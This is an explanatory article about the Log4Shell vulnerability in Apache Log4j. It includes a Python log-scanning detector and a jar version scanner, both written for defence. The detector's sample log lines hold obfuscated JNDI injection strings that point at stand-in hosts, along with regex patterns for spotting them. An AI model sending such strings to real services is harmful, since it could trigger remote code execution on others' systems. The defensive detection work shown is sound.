Log4Shell (CVE-2021-44228) was a zero-day vulnerability in Log4j, a popular Java logging framework, that allows remote code execution. The flaw lies in Log4j's message lookup feature: if a logged string contains a JNDI lookup of the form ${jndi:ldap://<attacker host>/a}, Log4j resolves it at log time by contacting that server and can load and run a Java class the server returns, so an attacker only needs to get such a string into something the application logs (an HTTP header, a username, a chat message). The lookup had existed unnoticed since 2013 (Log4j 2.0-beta9). The vulnerability was privately disclosed to the Apache Software Foundation, of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud's security team on 24 November 2021, and was publicly disclosed on 9 December 2021.
What is Log4J?
Log4j is a Java-based logging utility that is part of the Apache Logging Services project. It is one of several Java logging frameworks and is used by millions of Java applications, many of them reachable from the internet.
Apache gave Log4Shell a CVSS base score of 10.0, the highest possible. The exploit is simple to execute (a single crafted string in any field that gets logged) and the vulnerability is estimated to affect hundreds of millions of devices.
Image Source: GovCERT.ch
Successful exploitation allows attackers to:
- Run arbitrary code on the affected device or application, with the privileges of the process that does the logging
- Use that foothold to reach the rest of the network
- Access all data the affected device or application can reach
- Delete or encrypt files
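A first line of defence while patching is to spot exploitation attempts in the logs you already have. That is harder than grepping for "jndi", because Log4j evaluates nested lookups before the JNDI one, so attackers hide the keyword as ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...}. The following is an added example written for this page, not code from the original article: a Python detector that undoes the lower/upper and default-value lookups the same way Log4j does, URL-decodes access-log lines, and then matches the normalized ${jndi:<scheme>:...} form. The sample log lines are constructed for the example and use documentation IP ranges.

```python
import re
from urllib.parse import unquote

# Innermost lookup: a ${...} whose body contains no further "${".
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalization: ${jndi:<scheme>:...}. Log4j lower-cases
# the lookup name, so "JNDI" and "jndi" are equivalent.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def normalize(text, max_rounds=20):
    """Undo the lookup tricks used to hide the string 'jndi' from naive
    pattern matching: ${lower:X}/${upper:X} case mapping and ${name:-X}
    defaults (${::-j}, ${env:NOPE:-j}), evaluated innermost-first the way
    Log4j itself does. Lookups of other kinds are kept as they are."""
    text = unquote(unquote(text))  # access logs usually hold the URL-encoded form

    def collapse(m):
        body = m.group(1)
        kind, _, value = body.partition(":")
        if kind.lower() == "lower":
            return value.lower()
        if kind.lower() == "upper":
            return value.upper()
        if ":-" in body:
            return body.split(":-", 1)[1]  # the default value is what Log4j substitutes
        return "\x00" + body + "\x01"      # not reducible: shield it from re-matching

    for _ in range(max_rounds):
        new = INNER.sub(collapse, text)
        if new == text:
            break
        text = new
    return text.replace("\x00", "${").replace("\x01", "}")


def find_jndi(line):
    """Return (scheme, payload) for each JNDI lookup hidden in one log line."""
    norm = normalize(line)
    hits = []
    for m in JNDI.finditer(norm):
        end = norm.find("}", m.end())
        payload = norm[m.start(): end + 1] if end != -1 else norm[m.start():]
        hits.append((m.group(1).lower(), payload))
    return hits


def scan_log(lines):
    """Run the check over an iterable of log lines; return (line no, scheme, payload)."""
    return [(n, scheme, payload)
            for n, line in enumerate(lines, 1)
            for scheme, payload in find_jndi(line)]


# Constructed sample access-log lines (not real traffic): one benign request,
# three exploitation attempts with increasing obfuscation, and one benign
# lookup that a naive "${" match would flag.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:12 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F203.0.113.4%2Fx%7D HTTP/1.1" 404 196 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.4/x}"',
    '10.0.0.2 - - [10/Dec/2021:03:14:20 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, scheme, payload in scan_log(SAMPLE_LOG):
        print(f"line {n}: {scheme} lookup -> {payload}")
```

Point scan_log at a real access log (one entry per line) to triage. Because the normalization follows Log4j's own innermost-first evaluation, it catches encodings a plain substring match misses while leaving benign lookups such as ${date:yyyy} alone; it does not attempt every lookup Log4j supports, so treat it as a triage filter, not proof of absence.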
What Devices and Applications are Vulnerable to Log4Shell?
Any application or device that uses Apache Log4j 2 from version 2.0-beta9 up to and including 2.14.1 and logs data an attacker can influence is vulnerable to Log4Shell. Direct internet exposure is not required: the crafted string can reach an internal service through a proxy, a message queue or a database field that is logged later. Log4j 1.x has no JNDI lookup and is not affected by CVE-2021-44228, but it is end-of-life and has its own issue (CVE-2021-4104, listed below).
Vulnerability Type: Remote Code Execution
Severity: Critical
Base CVSS Score: 10.0
Versions Affected: All versions from 2.0-beta9 to 2.14.1 (fixed in 2.15.0; the follow-up CVEs were fixed in 2.16.0, 2.17.0 and 2.17.1, so upgrade to 2.17.1 or later)
Log4j Vulnerability Detection:
Several tools scan packages and dependency trees for vulnerable Log4j versions. One of them is described below.
Log4j Detect
Log4j Detect is a free CLI tool that scans your projects for vulnerable Log4j versions affected by the following known CVEs:
- CVE-2021-45046: incomplete fix for CVE-2021-44228 in 2.15.0 (fixed in 2.16.0)
- CVE-2021-44228: Log4Shell itself, remote code execution through the JNDI lookup (fixed in 2.15.0)
- CVE-2021-4104: Log4j 1.2 JMSAppender deserialization, exploitable only when the attacker can write the logging configuration
- CVE-2021-45105: uncontrolled recursion in lookup evaluation leading to denial of service (fixed in 2.17.0)
- CVE-2021-44832: remote code execution through the JDBC Appender when the attacker can modify the logging configuration (fixed in 2.17.1)
It reports the exact path to the direct and indirect (transitive) dependencies that pull in the vulnerable version, along with the fixed version, for speedy remediation.
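Log4j Detect's own implementation is not reproduced here. As an added example (Python, written for this page, not the tool's code), the following shows what such a scan has to do to be trustworthy: read the version from the Maven pom.properties that every log4j-core jar carries, check whether JndiLookup.class is still present (the documented hot-fix deletes it, which mitigates CVE-2021-44228 and CVE-2021-45046 but not the later CVEs), recurse into jars nested inside WARs, EARs and fat jars (the indirect-dependency case), and map the version onto the fixed release of each listed CVE, including the 2.12.x (Java 7) and 2.3.x (Java 6) back-port lines that a naive "less than 2.17.1" comparison mislabels. The jar and WAR produced by build_fake_jar and build_fake_war are constructed test input, not real artefacts.

```python
import io
import re
import zipfile
from pathlib import Path

# Class implementing the JNDI lookup; deleting it is the documented hot-fix for CVE-2021-44228/-45046.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata shipped in every log4j-core jar; it records the exact version.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Log4j 1.2 appender behind CVE-2021-4104 (needs attacker-controlled configuration).
JMS_APPENDER = "org/apache/log4j/net/JMSAppender.class"

# First fixed version of each CVE on the three Log4j 2 release lines:
# main line, 2.12.x (Java 7) and 2.3.x (Java 6).
FIXES = {
    "CVE-2021-44228": {"main": (2, 15, 0), "2.12": (2, 12, 2), "2.3": (2, 3, 1)},
    "CVE-2021-45046": {"main": (2, 16, 0), "2.12": (2, 12, 2), "2.3": (2, 3, 1)},
    "CVE-2021-45105": {"main": (2, 17, 0), "2.12": (2, 12, 3), "2.3": (2, 3, 1)},
    "CVE-2021-44832": {"main": (2, 17, 1), "2.12": (2, 12, 4), "2.3": (2, 3, 2)},
}
NEEDS_JNDI_LOOKUP = {"CVE-2021-44228", "CVE-2021-45046"}
ARCHIVES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1). Pre-release suffixes ('2.0-beta9') are treated
    as the base version, which errs on the side of flagging them."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(g or 0) for g in m.groups()) if m else None


def release_line(version):
    if version[:2] == (2, 12):
        return "2.12"
    if version[:2] == (2, 3):
        return "2.3"
    return "main"


def cves_for(version, has_jndi_lookup):
    """CVEs from FIXES that affect a given log4j-core version."""
    if version is None or version[0] != 2:
        return []
    line = release_line(version)
    found = []
    for cve, fixes in FIXES.items():
        if version >= fixes[line]:
            continue
        if cve in NEEDS_JNDI_LOOKUP and not has_jndi_lookup:
            continue  # JndiLookup.class was stripped, so the lookup cannot run
        found.append(cve)
    return found


def scan_jar(data, path):
    """Inspect one archive (as bytes) and every archive nested inside it
    (WAR/EAR/fat jars), returning [(path, version, [cves]), ...]."""
    results = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return results
    names = set(zf.namelist())
    if POM_PROPS in names:
        version = None
        for prop in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if prop.startswith("version="):
                version = parse_version(prop.split("=", 1)[1])
        results.append((path, version, cves_for(version, JNDI_LOOKUP in names)))
    if JMS_APPENDER in names:
        results.append((path, None, ["CVE-2021-4104"]))
    for name in sorted(names):
        if name.lower().endswith(ARCHIVES):
            results.extend(scan_jar(zf.read(name), f"{path}!/{name}"))
    return results


def scan_tree(root):
    """Walk a directory tree and scan every archive under it."""
    results = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in ARCHIVES:
            results.extend(scan_jar(p.read_bytes(), str(p)))
    return results


def build_fake_jar(version, strip_jndi_lookup=False):
    """Constructed sample input: a minimal stand-in for a log4j-core jar."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if not strip_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def build_fake_war(jars):
    """Constructed sample input: a WAR bundling the given {entry name: jar bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in jars.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    war = build_fake_war({"WEB-INF/lib/log4j-core-2.14.1.jar": build_fake_jar("2.14.1")})
    for path, version, cves in scan_jar(war, "app.war"):
        print(path, version, cves or "clean")
```

scan_tree("/opt/app") walks a deployment and returns one row per Log4j archive found, nested ones addressed as outer.war!/inner.jar. A scan of this kind only sees jars on disk: Log4j relocated into a shaded jar under a renamed package, or resolved from a repository at build time, still needs the dependency-graph view that tools such as Log4j Detect provide.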
Article Source:- https://www.detoxtechnologies.com/what-is-log4shell
Detox Technologies is an ISO 27001:2013 certified global consultation and implementation company, headquartered in Derbyshire, UK, with an R&D centre in Delhi. We believe in precision and quality above everything else.